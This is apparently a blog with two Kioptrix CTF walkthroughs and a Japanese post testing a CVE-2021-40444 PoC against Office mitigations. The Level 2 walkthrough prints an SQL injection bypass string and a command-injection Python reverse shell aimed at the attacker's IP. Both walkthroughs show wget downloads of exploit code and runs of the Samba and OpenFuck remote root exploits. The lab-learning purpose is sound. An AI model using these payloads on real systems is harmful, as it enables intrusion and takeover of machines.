Kioptrix Level 2 Walkthrough

CTF

I write Kioptrix Level2 walkthrough in English for my English training.

Kioptrix Level1 Walkthrough is previous post

Enumeration

arp-scan

Use arp-scan to look up vulnerable VM. 192.168.174.144 is the Kioptrix Level2 VM.

$ sudo arp-scan 192.168.174.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:14:46:33, IPv4: 192.168.174.132
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.174.1   00:50:56:c0:00:08       VMware, Inc.
192.168.174.2   00:50:56:f8:87:2c       VMware, Inc.
192.168.174.145 00:0c:29:d5:8b:05       VMware, Inc.
192.168.174.254 00:50:56:f1:9f:7e       VMware, Inc.

Nmap

$ ipaddr=192.168.174.145
$ ports=$(nmap -p- --min-rate=1000 -T4 $ipaddr | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
$ nmap -sC -sV -p$ports $ipaddr
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 09:31 EDT
Nmap scan report for 192.168.174.145
Host is up (0.00049s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            614/udp   status
|_  100024  1            617/tcp   status
443/tcp  open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2021-09-16T10:22:15+00:00; -3h09m36s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
617/tcp  open  status     1 (RPC #100024)
631/tcp  open  ipp        CUPS 1.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      MySQL (unauthorized)

Host script results:
|_clock-skew: -3h09m36s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.11 seconds

Nikto

$ nikto -h $ipaddr
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.174.145
+ Target Hostname:    192.168.174.145
+ Target Port:        80
+ Start Time:         2021-09-16 19:12:01 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time:           2021-09-16 19:12:44 (GMT-4) (43 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Web Access and OWASP ZAP scan

I access the Web page on the VM. I tested with OWASP ZAP to look up vulnerabilities.

f:id:kataware8136:20210918180647p:plain

f:id:kataware8136:20210918181759p:plain

As a result, SQL Injection may be possible. I input test' OR '1'='1 then bypass the authentication.

f:id:kataware8136:20210918183308p:plain

After bypass the authentication, site shows ping machine.

But this page contains OS command Injection. So I set reverse shell.

Input below string in the form, and use nc to receive shell.

192.168.174.132;export RHOST="192.168.174.132";export RPORT=4242;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
$ nc -l -p 4242
sh-3.00$ uname -a
uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
sh-3.00$ whoami
whoami
apache

Privileged Escalation

I get the local shell. Then, collect the information of target.

sh-3.00$ cat /proc/version
cat /proc/version
Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8)) #1 Wed May 2 13:52:16 EDT 2007
sh-3.00# cat /etc/redhat-release
cat /etc/redhat-release
CentOS release 4.5 (Final)

Linux kernel version is 2.6.9. Use searchsploit to explore pirvilege escalation tool.

Below exploit may be used.

Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation - Linux local Exploit

$ searchsploit linux kernel 2.6. CentOS
--------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                             |  Path
--------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / | linux/local/9545.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/ | linux_x86/local/9542.c
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Esc | linux/local/25444.c
Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'M | linux_x86-64/local/45516.c
--------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
$ cp /usr/share/exploitdb/exploits/linux/local/9545.c ./
$ python3 -m http.server 80
sh-3.00$ cd /tmp
cd /tmp
sh-3.00$ wget http://192.168.174.132/9545.c
wget http://192.168.174.132/9545.c
--11:15:40--  http://192.168.174.132/9545.c
           => `9545.c'
Connecting to 192.168.174.132:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,408 (9.2K) [text/x-csrc]

100%[====================================>] 9,408         --.--K/s             

11:15:40 (1.10 GB/s) - `9545.c' saved [9408/9408]

sh-3.00$ gcc -o privesc 9545.c
gcc -o privesc 9545.c
9545.c:376:28: warning: no newline at end of file
sh-3.00$ ls
ls
9545.c  privesc
sh-3.00$ chmod +x privesc
chmod +x privesc
sh-3.00$ ./privesc
./privesc
sh-3.00# whoami
whoami
root

I can get the root.

Kioptrix Level1 Walkthrough

CTF

I write Kioptrix Level1 walkthrough in English for my English training.

Enumeration

First, an Nmap scan revealed what services running on a target. Older version of Apache2 and samba are running.

$ ports=$(nmap -p- --min-rate=1000 -T4 192.168.174.142 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)`
$ nmap -sC -sV -p$ports 192.168.174.142
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-07 09:00 EDT
Nmap scan report for 192.168.174.142
Host is up (0.00042s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1026/udp   status
139/tcp  open  netbios-ssn Samba smbd (workgroup: aMYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2021-09-06T05:35:15+00:00; -1d07h26m26s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
1024/tcp open  status      1 (RPC #100024)

Host script results:
|_clock-skew: -1d07h26m26s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.02 seconds

Samba Approach

enum4linux & smbver.sh

I use enum4linux to collect information, but error E] Server doesn't allow session using username '', password ''. Aborting remainder of tests. has occured.

$ enum4linux -a 192.168.174
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Sep 13 09:06:23 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.174
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 =================================================== 
|    Enumerating Workgroup/Domain on 192.168.174    |
 =================================================== 
[E] Can't find workgroup/domain


 =========================================== 
|    Nbtstat Information for 192.168.174    |
 =========================================== 
Looking up status of 192.168.0.174
No reply from 192.168.0.174

 ==================================== 
|    Session Check on 192.168.174    |
 ==================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

When I research error, I have to write client min protocol = NT1 in /etc/samb/smb.conf.

After overwrite smb.conf, the result of enum4linux is as follows.

$ enum4linux -a 192.168.174.142
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Sep 13 09:08:15 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.174.142
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ======================================================= 
|    Enumerating Workgroup/Domain on 192.168.174.142    |
 ======================================================= 
[+] Got domain/workgroup name: MYGROUP

 =============================================== 
|    Nbtstat Information for 192.168.174.142    |
 =============================================== 
Looking up status of 192.168.174.142
        KIOPTRIX        <00> -         B <ACTIVE>  Workstation Service
        KIOPTRIX        <03> -         B <ACTIVE>  Messenger Service
        KIOPTRIX        <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        MYGROUP         <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        MYGROUP         <1d> -         B <ACTIVE>  Master Browser
        MYGROUP         <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ======================================== 
|    Session Check on 192.168.174.142    |
 ======================================== 
[+] Server 192.168.174.142 allows sessions using username '', password ''

 ============================================== 
|    Getting domain SID for 192.168.174.142    |
 ============================================== 
Domain Name: MYGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ========================================= 
|    OS information on 192.168.174.142    |
 ========================================= 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.174.142 from smbclient: 
[+] Got OS info for 192.168.174.142 from srvinfo:
        KIOPTRIX       Wk Sv PrQ Unx NT SNT Samba Server
        platform_id     :       500
        os version      :       4.5
        server type     :       0x9a03

(snip)

But enum4linux don't show samba version. How to detect samba version?

I look up the shell script smbver.sh. The samba version is Unix.Samba 2.2.1a.

OSCPRepo/smbver.sh at master · rewardone/OSCPRepo · GitHub

f:id:kataware8136:20210915214703p:plain
smbver.sh result

searchsploit and exploit

Use seachsploit for searching exploit code. I thought Samba < 2.2.8 (Linux/BSD) - Remote Code Execution is useful in Kioptrix Level1.

$ searchsploit samba 2.2
--------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                             |  Path
--------------------------------------------------------------------------- ---------------------------------
Samba 2.0.x/2.2 - Arbitrary File Creation                                  | unix/remote/20968.txt
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)               | osx/remote/9924.rb
Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1)    | linux/remote/16321.rb
Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit)          | bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escal | linux/local/23674.txt
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)        | linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)          | osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)    | solaris_sparc/remote/16330.rb
Samba 2.2.8 - Brute Force Method Remote Command Execution                  | linux/remote/55.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)                 | unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2)                 | unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3)                 | unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4)                 | unix/remote/22471.txt
Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit)                       | linux/remote/9936.rb
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow    | unix/remote/22356.c
Samba 2.2.x - Remote Buffer Overflow                                       | linux/remote/7.pl
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution                          | multiple/remote/10.c
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution                          | multiple/remote/10.c
Samba < 3.0.20 - Remote Heap Overflow                                      | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                              | linux_x86/dos/36741.py
--------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
$ cp /usr/share/exploitdb/exploits/multiple/remote/10.c ./
$ gcc -o sambal 10.c 
$ ./sambal 
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./sambal [-bBcCdfprsStv] [host]

-b <platform>   bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B <step>       bruteforce steps (default = 300)
-c <ip address> connectback ip address
-C <max childs> max childs for scan/bruteforce mode (default = 40)
-d <delay>      bruteforce/scanmode delay in micro seconds (default = 100000)
-f              force
-p <port>       port to attack (default = 139)
-r <ret>        return address
-s              scan mode (random)
-S <network>    scan mode
-t <type>       presets (0 for a list)
-v              verbose mode
$ ./sambal -b 0 192.168.174.142
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root

Compile the exploit code and run the binary. You can get the root.

Apache2 Approach

search vulnerability

Use nikto to seach vulnerability.

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.174.142
+ Target Hostname:    192.168.174.142
+ Target Port:        80
+ Start Time:         2021-09-07 09:42:00 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep  5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  20 error(s) and 19 item(s) reported on remote host
+ End Time:           2021-09-07 09:48:55 (GMT-4) (415 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

I found CVE-2002-0082 .

Search exploit code and run

I also use seachsploit for searching exploit code.

$ searchsploit mod_ssl
-------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                    |  Path
-------------------------------------------------------------------------------------------------- ---------------------------------
Apache mod_ssl 2.0.x - Remote Denial of Service                                                   | linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow                                        | multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                              | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)                        | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)                        | unix/remote/47080.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow      | unix/remote/40347.txt
-------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
$ cp /usr/share/exploitdb/exploits/unix/remote/47080.c ./

Confirm source code of 47080.c, compile it and run.

$ head ./47080.c
/*
 * OF version r00t VERY PRIV8 spabam
 * Version: v3.0.4 
 * Requirements: libssl-dev    ( apt-get install libssl-dev )
 * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
 * objdump -R /usr/sbin/httpd|grep free to get more targets
 * #hackarena irc.brasnet.org
 * Note: if required, host ptrace and replace wget target
 */
$ gcc -o OpenFuck 47080.c -lcrypto
$ ./OpenFuck
$ ./OpenFuck 

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./OpenFuck target box [port] [-c N]

  target - supported box eg: 0x00
  box - hostname or IP address
  port - port for ssl connection
  -c open N connections. (use range 40-50 if u dont know)
  

  Supported OffSet:
        0x00 - Caldera OpenLinux (apache-1.3.26)
        0x01 - Cobalt Sun 6.0 (apache-1.3.12)
        0x02 - Cobalt Sun 6.0 (apache-1.3.20)
        0x03 - Cobalt Sun x (apache-1.3.26)

(snip)

I have to set target offset. Result of Nmap, I have to set 0x6a or 0x6b for target.

        0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
        0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
$ ./OpenFuck 0x6a 192.168.174.142 443

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
Good Bye!
$ ./OpenFuck 0x6b 192.168.174.142 443 -c 20

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 20 of 20
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
cc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit; -kmod.c; g 
--09:31:34--  http://192.168.174.132/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to 192.168.174.132:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   3.74 MB/s

09:31:34 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

gcc: file path prefix `/usr/bin' never used
[+] Attached to 6304
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
whoami
root

That's it.

CVE-2021-40444 の検証と緩和策・回避策について

検証

はじめに

(2021/09/15) RTFの検証およびWindowsUpdateの検証結果を追加

この記事はゼロデイ攻撃も観測されている、CVE-2021-40444について、PoCおよび緩和策を検証したものである。

今回はRCEによって電卓が起動するdocx文書ファイルを使用したところ、検証結果は次のとおりである。

  • Wordの保護ビューで開く場合、電卓は起動しない
  • グループポリシー設定やレジストリ設定は初めて開いたときは電卓は起動しないが、二回開くと電卓が起動した。

結論としては、保護ビューで開く、もしくは外部への通信が必要となるので、通信しない環境で開く(クローズにした仮想マシン)のがよさそう。 2021年9月の月例アップデートにてパッチが適用されたため、速やかに適用するのがよい。(2021/9/15追記)

また、この文書ファイルだけではないが、安全なことを確認できていないファイルは開かないことが重要である。 (安全と判断するのが難しくはある)

CVE-2021-40444についての簡単なまとめ

CVE-2021-40444については、すでに様々な記事にて解説はされているが、MSHTMLという実行ファイルにかかわる脆弱性であり、実際の攻撃としては、次の手順のものが確認されている。

  • 細工された.docxファイルを開く
  • 細工された.docxファイルが外部にあるHTMLファイルを取得する(通信を行う)
  • 取得したHTMLファイルをMSHTMLが実行し、cabファイルを悪用して攻撃する。

PoCの検証

今回はGithubに挙げられていた下記のPoCで検証した。このPoCでは試すと電卓が起動する。

GitHub - lockedbyte/CVE-2021-40444: CVE-2021-40444 PoC

検証した環境としては次の通り

  • Kali Linux
    • Windows 10で開くdocxファイルの作成
    • 開いたdocxが通信するサーバの役割(python3 -m http.server 80で実現)
  • Windows 10
    • docxを開くやられ環境

実際に実行すると次のようになる。(注:実際に実行した後に位置調整はしている)

f:id:kataware8136:20210912135332p:plain
PoCの検証

緩和策、回避策の検証

ここからはMicrosoftの緩和策、回避策を検証する

緩和策としては、保護ビューおよびApplication Guard for Officeがあるが、Application Guard for OfficeはMicrosoft365 Enterpriseの機能であるため、個人環境の私は検証できていない。

回避策としては、グループポリシーの設定もしくはレジストリの設定となっている。

保護ビューによる緩和策

保護ビューは「インターネットから取得したファイル」「安全でない可能性のある場所のファイル」「Outlookの添付ファイル」に対して制限モードで開く。 どのファイルを保護ビューで開くかは「オプション」→「トラストセンター」→「保護ビュー」で確認できる。

f:id:kataware8136:20210912140539p:plain
保護ビューについて

今回は仮想マシンで検証していたため、PoCで作成したファイルは保護ビューの対象ではないため、ZoneIDを付与して保護ビューで起動するように設定する。

ZoneIDについては次の@soji256氏のブログが参考になる。

ZoneID を付与する方法など - setodaNote

ZoneIDを付与して保護ビューで開いた結果、電卓は起動せず、次の通りとなった。

f:id:kataware8136:20210912141142p:plain
ZoneIDを付与した結果

編集を有効にするボタンを押すと電卓が起動するため、編集を有効にするボタンは押さないようにすることが大切である。

グループポリシーおよびレジストリによる緩和策

グループポリシーおよびレジストリにてActiveXコントロールを無効化するとのこと

グループポリシーの場合、[コンピュータの構成]→[管理用テンプレート]→[Windowsコンポーネント]→[Internet Explorer]→[インターネットコントロールパネル]→[セキュリティページ]の[インターネットゾーン]、[イントラネットゾーン]、[ローカルマシンゾーン]の[署名済みActiveXコントロールのダウンロード]および[未署名のActiveXコントロールのダウンロード]を無効化すればよい。

f:id:kataware8136:20210912143607p:plain
グループポリシーの設定

この設定をしたうえで、文書ファイルを開いた結果、電卓は起動しなかった。

f:id:kataware8136:20210912150747p:plain
グループポリシー設定後に開いた場合

なお、このファイルを閉じて再度文書ファイルを開くと電卓が起動した。

f:id:kataware8136:20210912150938p:plain
グループポリシー設定後の二回開いた場合

また、レジストリの設定は下記の内容のテキストデータを.reg拡張子で保存し、実行する。

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1001"=dword:00000003
"1004"=dword:00000003

レジストリを反映させた後は、再起動を行う。

これを設定した後に文書ファイルを開いたところ、グループポリシー設定時と同様に初めて開いた場合は電卓が起動しなかったが、一度文書ファイルを閉じたあと再度開くと電卓が起動してしまった。

グループポリシーおよびレジストリ設定した後、二回開くと電卓が起動するという点について、なぜ起動してしまうのかは不明。 私の設定が何か間違っている可能性はあるかもしれないが、あまり過信をしてはよくない可能性はある。

RTFの検証結果(2021/9/15追記)

上の節で作成した、docxファイルをrtfに保存しなおして、RTFでのCVE-2021-40444がどうなるかを検証した。

